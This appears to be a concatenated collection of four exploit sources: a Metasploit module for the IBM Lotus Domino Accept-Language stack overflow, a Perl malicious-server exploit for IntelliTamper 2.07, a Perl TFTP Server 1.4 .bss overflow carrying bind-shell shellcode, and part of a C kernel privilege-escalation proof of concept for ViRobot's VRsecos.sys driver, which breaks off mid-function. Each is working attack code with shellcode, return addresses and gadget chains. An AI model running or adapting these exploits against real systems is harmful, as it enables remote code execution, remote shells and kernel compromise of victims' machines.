metasploit/IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow ( windows)
##
# $Id: domino_http_accept_language.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking
  include Msf::Exploit::Remote::HttpClient

  # Module metadata.
  #
  # Payload constraints: BadChars rules out NUL and the characters an HTTP
  # parser treats as header delimiters (LF, space, comma, semicolon) because
  # the whole buffer, payload included, is sent as a single Accept-Language
  # header value. Each target's keys are the gadget addresses that exploit()
  # writes into that buffer; the targets marked "(NX)" additionally carry the
  # FixESI/FixEBP/Ret/DisableNX chain, which exploit() only uses when the
  # target defines 'DisableNX'. All addresses are hard-coded for the English
  # builds named in the target strings.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
      'Description' => %q{
This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
request with an Accept-Language header greater than 114 bytes.
},
      'Author' => [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 10998 $',
      'References' =>
        [
          ['CVE', '2008-2240'],
          ['OSVDB', '45415'],
          ['BID', '29310'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged' => true,
      'Payload' =>
        {
          'Space' => 800,
          'BadChars' => "\x00\x0a\x20\x2c\x3b",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
            {
              'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
              'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
              'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
              'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll
              'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
              'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
            }
          ],
          ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
            {
              'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
              'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
              'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
              'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll
              'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll (only this address differs from SP1)
              'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
            }
          ],
          ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
            {
              'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
              'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll (same gadget as the NX targets above)
            }
          ],
          ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
            {
              'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
              'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
              'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
              'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
              'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
              'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
            }
          ],
          ['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
            {
              'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
              'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
              'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
              'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
              'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll (only this address differs from SP1)
              'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
            }
          ],
          ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
            {
              'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
              'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
            }
          ],
        ],
      'DisclosureDate' => 'May 20 2008'))
    register_options( [ Opt::RPORT(80) ], self.class )
  end

  # Builds the Accept-Language value and sends it in a single GET.
  #
  # Layout of +lang+, by byte offset into the header value: 116 bytes of
  # random alphanumerics with gadget addresses planted at fixed offsets, a NUL
  # at offset 116, then the encoded payload. The "# N" suffixes are the
  # original authors' numbering and match the execution order: FixESP (1)
  # pivots the stack and returns into JmpESP; jmp esp lands on the short jump
  # whose displacement brings execution back to the stub at offset 16
  # (84+2-0x46 and 100+2-0x56 both equal 16); the stub realigns ESP, pops a
  # pointer, adds 0x86 to it and calls it (presumably into the payload -- the
  # stub source is the only evidence here). The stub is 15 bytes on the
  # non-NX targets and 16 bytes (one extra pop) on the NX targets.
  def exploit
    connect
    lang = rand_text_alphanumeric(116) # greetz to hateful chris
    # Three target-independent fix-ups the authors added to survive earlier
    # faults; nothing here documents what the 0x7ffaf0xx addresses point at.
    lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi)
    lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax)
    lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash
    lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1
    # Terminator for the 116-byte header overflow. The payload itself cannot
    # contain NUL (see BadChars), so this is the only NUL in the value.
    lang << "\x00"
    lang << payload.encoded
    if(not target['DisableNX'])
      # No DEP: JmpESP at 80 is reached straight from FixESP's ret.
      lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4
      lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2
      lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top
    else
      # DEP: the chain at offsets 80-111 disables NX for the process before
      # JmpESP is used (numbers give the order the gadgets run in).
      lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8
      lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2
      lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3
      lang[ 88, 4 ] = [target['Ret']].pack('V') # 4
      lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6
      lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top
      lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5
    end
    # Request line marked "Trigger" by the authors: a random .nsf resource
    # with one high-ASCII byte in the query string.
    uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger
    print_status("Trying target #{target.name}...")
    # Raw request so the overflow goes out exactly as built; the browser-like
    # headers are cosmetic. 5 second response timeout.
    send_request_raw({
      'uri' => "#{uri}",
      'method' => 'GET',
      'headers' =>
        {
          'Accept' => '*/*',
          'Accept-Language' => "#{lang}",
          'Accept-Encoding' => 'gzip,deflate',
          'Keep-Alive' => '300',
          'Connection' => 'keep-alive',
          'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        }
    }, 5)
    handler
    disconnect
  end
end
Koshi/IntelliTamper 2.07 (server header) Remote Code Execution Exploit ( windows)
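#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"
# or even changing it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
# Acts as a malicious HTTP server: accepts one IntelliTamper connection and
# answers with a response whose Server: header carries the overflow. Buffer
# layout, as in the original: 1536 bytes of padding, the saved return address
# (a "call esp" in ntdll), filler, then 338 bytes of Alpha2-encoded shellcode
# that launches calc.exe.
#
use strict;
use warnings;
use IO::Socket;

my $msg = "";
my $overflow = "A" x 1536;
my $fun = "" .
    "\xb3\x8d\x95\x7c" .                                       # EIP (0x7C958DB3 call esp NTDLL.DLL)
    "z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C" . # More buffer.
    "AAAA2Cb3Cb4CBBBB";                                        # Starts executing here

# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $sh3llcode =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63" .
    "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32" .
    "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a" .
    "\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c" .
    "\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36" .
    "\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76" .
    "\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e" .
    "\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f" .
    "\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48" .
    "\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64" .
    "\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37" .
    "\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f" .
    "\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49" .
    "\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45" .
    "\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b" .
    "\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51" .
    "\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b" .
    "\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43" .
    "\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43" .
    "\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37" .
    "\x70\x63";

my $buff = "$overflow$fun$sh3llcode";
my $resp = "" .
    "HTTP/1.1 200 OK\r\n" .
    "Connection: close\r\n" .
    "Content-Length: 8\r\n" .
    "Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n" .
    "Content-Type: text/plain\r\n" .
    "Server: $buff\r\n" .
    "MIME-Version: 1.0\r\n\r\n" .
    "Exploit!\r\n";

# The original never checked the listener; binding port 80 needs privileges
# and the port may be taken, so fail loudly instead of calling accept() on
# undef.
my $sock = IO::Socket::INET->new(
    LocalPort => '80',
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
) or die "cannot listen on port 80: $!\n";
print "Listening on port 80 for connections...\n";
my $new_sock = $sock->accept() or die "accept failed: $!\n";
print "Got connection from client...\n";
# Consume (and ignore) up to 190 bytes of the client's request before replying.
defined(recv($new_sock, $msg, 190, 0)) or die "recv failed: $!\n";
print "Sending client packet...\n";
print {$new_sock} $resp;
print "Packet sent to client, voila?\n";
close($new_sock);   # the original closed only the listener and left this one open
close($sock);
print "Socket closed\n";
# milw0rm.com [2008-07-22]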
tixxDZ/TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit ( windows)
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <tixxdz@gmail.com>
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer follows RFC 1350 for Error packets; many other TFTP
# servers do not.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit overwrites the whole .bss section and part of the .idata section
# in order to patch function addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.
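use strict;
use warnings;
use IO::Socket::INET;

# Arguments: <target> [<type>]. <type> defaults to 's' (service); any value
# containing 'p' selects the RunStandAlone padding below.
my $target = shift ||
    die "Usage: $0 <target> <type>\n <type> : type of the program\n".
        "\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";
my $type = defined $ARGV[0] ? shift : 's';

my $shellcode =
    # windows/shell_bind_tcp - 500 bytes
    # http://www.metasploit.com
    # EXITFUNC=seh, LPORT=4444
    "\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" .
    "\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" .
    "\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" .
    "\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" .
    "\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" .
    "\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" .
    "\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" .
    "\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" .
    "\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" .
    "\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" .
    "\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" .
    "\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" .
    "\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" .
    "\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" .
    "\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" .
    "\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" .
    "\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" .
    "\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" .
    "\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" .
    "\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" .
    "\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" .
    "\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" .
    "\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" .
    "\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" .
    "\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" .
    "\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" .
    "\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" .
    "\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" .
    "\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" .
    "\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" .
    "\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" .
    "\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" .
    "\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" .
    "\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" .
    "\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" .
    "\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";

# Value written over the IAT slot at the very end of the buffer. 0x00420101
# lies in the .idata section and, going by the buffer address in the header
# comment (0x0041B3AB), inside the NOP sled, so the patched import slides
# into the shellcode. The original declared this as a confusing
# `my ($RET,$buffer) = "..."` list assignment.
my $RET = "\x01\x01\x42\x00";
my $buffer;
if ($type =~ /p/i) {
    # "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
    # ---------------------------------------------------------------------------
    # 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
    # ---------------------------------------------------------------------------
    print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
    $buffer = "\x90" x 19907 . $shellcode . $RET;   # 19907 + 500 + 4 = 20411
}
else {
    # "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
    # ------------------------------------------------------------------------
    # 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
    # ------------------------------------------------------------------------
    print STDOUT "Exploiting TFTPServer Service program\n";
    $buffer = "\x90" x 19955 . $shellcode . $RET;   # 19955 + 500 + 4 = 20459
}

my $sock = IO::Socket::INET->new(PeerAddr => $target,
                                 PeerPort => 69,
                                 Proto    => 'udp')
    or die "error: $!\n";
# Opcode 5 = ERROR, message = the overflow, terminating NUL supplied by $RET.
# send() returns undef on failure (e.g. a datagram the local stack refuses);
# the original discarded that and reported "done." regardless.
defined($sock->send("\x00\x05" . $buffer, 0))
    or die "send failed: $!\n";
print STDOUT "done.\n";
exit 0;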
# milw0rm.com [2008-05-08]
MJ0011/ViRobot Desktop 5.5 / Server 3.5 Privilege Escalation ( na)
Hauri
ViRobot Desktop 5.5 & ViRobot Server 3.5 VRsecos.sys <=2008.8.1.1 Local Kernel Mode Privilege Escalation Vulnerability
AUTHOR
MJ0011
EMAIL
th_decoder$126.com
VULNERABLE PRODUCTS
Hauri ViRobot Desktop 5.5 and below
Hauri ViRobot Server 3.5 and below
DETAILS:
VRsecos.sys creates a device called "VRsecos" and handles DeviceIoControl code 0x8307202c. That handler uses strcpy to copy memory from the IRP SystemBuffer into the driver's data area; because the copy is not bounded, it can overwrite critical kernel object memory in vrsecos.sys's data area.
EXPLOIT CODE: (Test On Windows XP SP3 , only for vrsecos.sys == 2008.8.1.1)
\
// virobot0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
#include "malloc.h"
// User-mode mirrors of the kernel's DISPATCHER_HEADER and KMUTANT, 32-bit
// layout (4 flag bytes + SignalState + LIST_ENTRY = 16-byte header). main()
// lays an X_KMUTANT inside the IOCTL input buffer so that the bytes the
// driver copies over its data area look like a valid mutant (signal state,
// list links and owner thread are the fields main() fills in).
typedef struct X_DISPATCHER_HEADER{
UCHAR Type ;
UCHAR Absolute ;
UCHAR Size ;
UCHAR Inserted ;
ULONG SignalState ;
LIST_ENTRY WaitListHead ;
}X_DISPATCHER_HEADER , *PX_DISPATCHER_HEADER;
typedef struct X_KMUTANT{
X_DISPATCHER_HEADER Header ;
LIST_ENTRY MutantListEntry ;
PVOID OwnerThread ;
UCHAR Abandoned ;
UCHAR ApcDisable ;
}X_KMUTANT , *PX_KMUTANT;
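// Query one ZwQuerySystemInformation table into a malloc'd buffer, doubling
// the buffer (starting at 0x4000 bytes) until the call stops returning
// STATUS_INFO_LENGTH_MISMATCH (0xC0000004).
//
// ATableType: SystemInformationClass value (SystemModuleInformation or
//             SystemHandleInformation in this program).
// Returns the filled buffer on STATUS_SUCCESS (caller frees it), or NULL when
// the export cannot be resolved, malloc fails, or any other NTSTATUS comes
// back.
PVOID GetInfoTable(ULONG ATableType)
{
    // Same four-argument stdcall signature the original inline asm invoked
    // (ATableType, buffer, size, ReturnLength = NULL). A typed call replaces
    // the MSVC-only __asm block and lets a missing export be reported instead
    // of calling through address 0.
    typedef LONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
    const LONG kInfoLengthMismatch = (LONG)0xc0000004;
    ULONG mSize = 0x4000;
    HMODULE hlib = GetModuleHandle("ntdll.dll");
    ZWQUERYSYSTEMINFORMATION pZwQuerySystemInformation =
        hlib ? (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hlib, "ZwQuerySystemInformation") : NULL;
    if (pZwQuerySystemInformation == NULL)
    {
        return NULL;
    }
    for (;;)
    {
        PVOID mPtr = malloc(mSize);
        if (mPtr == NULL)
        {
            return NULL;
        }
        LONG status = pZwQuerySystemInformation(ATableType, mPtr, mSize, NULL);
        if (status == 0)
        {
            return mPtr;
        }
        free(mPtr);
        if (status != kInfoLengthMismatch)
        {
            return NULL;
        }
        mSize = mSize * 2;   // too small: retry with a larger buffer
    }
}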
// Layouts of the buffers ZwQuerySystemInformation returns for the two
// information classes used below. These are not in the public SDK headers;
// the field widths (USHORT pid/handle, 32-bit pointers) are the 32-bit
// layouts, so this code is x86-only.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;          // kernel address of the object; main() reads its own thread's from here
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];   // variable length, NumberOfHandles entries
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
// SystemInformationClass values passed to GetInfoTable().
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;            // load address of the kernel module
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];   // full path; main() matches on its tail
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];   // variable length, Count entries
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
// Function-pointer types for the boot-video (Inbv*) exports of the kernel
// image. InbvInit() fills the globals below with the exports' addresses
// rebased onto the running kernel; InbvShellCode() then calls them while
// executing in ring 0. Declared WINAPI (stdcall) to match the kernel exports.
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2,
ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
PUCHAR *Str
);
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
// Resolved kernel addresses; all zero until InbvInit() succeeds.
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;
// Colour indices for InbvSolidColorFill / InbvSetTextColor. Only BLACK and
// BRIGHT_GREEN are used below; the misspelled names are kept as written.
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
// Text painted on the boot-video console by InbvShellCode(). One string
// literal per line of output (the literals were presumably padded to the
// console width in the original; this copy shows them collapsed).
UCHAR DisplayString[] =
" "
" "
" "
" ---- ===== EXPLOIT SUCCESSFULLY ==== ---- "
" "
" "
" ViRobot Desktop 5.5 & ViRobot Server 3.5 Local Privilege Escalation Exploit "
" "
" VULNERABLE PRODUCT "
" "
" ViRobot Desktop 5.5 and below "
" ViRobot Server 3.5 and below "
" "
" VULERABLE FILE "
" VRsecos.sys <= 2008.8.1.1 "
" "
" AUTHOR "
" "
" MJ0011 "
" th_decoder$126.com "
" "
" 2010-8-22 "
" "
" "
" ";
// Ring-0 payload. main() stores this function's address as the
// NPAGED_LOOKASIDE_LIST AllocateRoutine inside the overflow data, so the
// driver ends up calling it in kernel context. It paints a message on the
// boot-video console and never returns: interrupts are disabled first (cli)
// and it spins forever afterwards, so the machine is effectively halted --
// this is a proof of concept, not a usable escalation.
// Kernel-mode code here can only use the resolved Inbv* pointers and
// DisplayString; it must not touch any other user-mode import.
VOID InbvShellCode()
{
//DISABLE INTERRUPT
__asm
{
cli
}
//RESET TO VGA MODE
InbvAcquireDisplayOwnership();
InbvResetDisplay();
//FILL FULL SCREEN
InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
InbvInstallDisplayStringFilter(NULL);
InbvEnableDisplayString(TRUE);
InbvSetScrollRegion( 0 , 0 , 639 ,477);
InbvDisplayString(DisplayString);
while(TRUE)
{
};
}
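// Rebase one export of the user-mode-loaded kernel image onto the kernel's
// real load address. Returns NULL when the export is missing so that the
// caller's validation actually fires: the original computed
// `GetProcAddress() - hlib + ntosbase` unconditionally, which turns a NULL
// GetProcAddress result into a bogus non-NULL address and made the NULL
// checks in InbvInit() dead code.
static PVOID RebaseKernelExport(HMODULE hlib, PVOID ntosbase, PCSTR name)
{
    FARPROC p = GetProcAddress(hlib, name);
    if (p == NULL)
    {
        return NULL;
    }
    // 32-bit arithmetic, like the rest of this x86-only PoC.
    return (PVOID)((ULONG)p - (ULONG)hlib + (ULONG)ntosbase);
}

// Resolve the Inbv* kernel exports into the globals above.
//
// ntosbase: kernel image load address (from SystemModuleInformation).
// ntosname: file name of that image; it is loaded into this process with
//           LoadLibrary purely to read its export table, and the resulting
//           addresses are rebased onto ntosbase.
// Returns TRUE when every export was found, FALSE if the image could not be
// loaded or any export is missing (the globals are then partially filled
// and must not be used).
BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
    HMODULE hlib = LoadLibrary(ntosname);
    if (hlib == NULL)
    {
        return FALSE ;
    }
    InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)RebaseKernelExport(hlib, ntosbase, "InbvAcquireDisplayOwnership");
    InbvResetDisplay = (PINBV_RESET_DISPLAY)RebaseKernelExport(hlib, ntosbase, "InbvResetDisplay");
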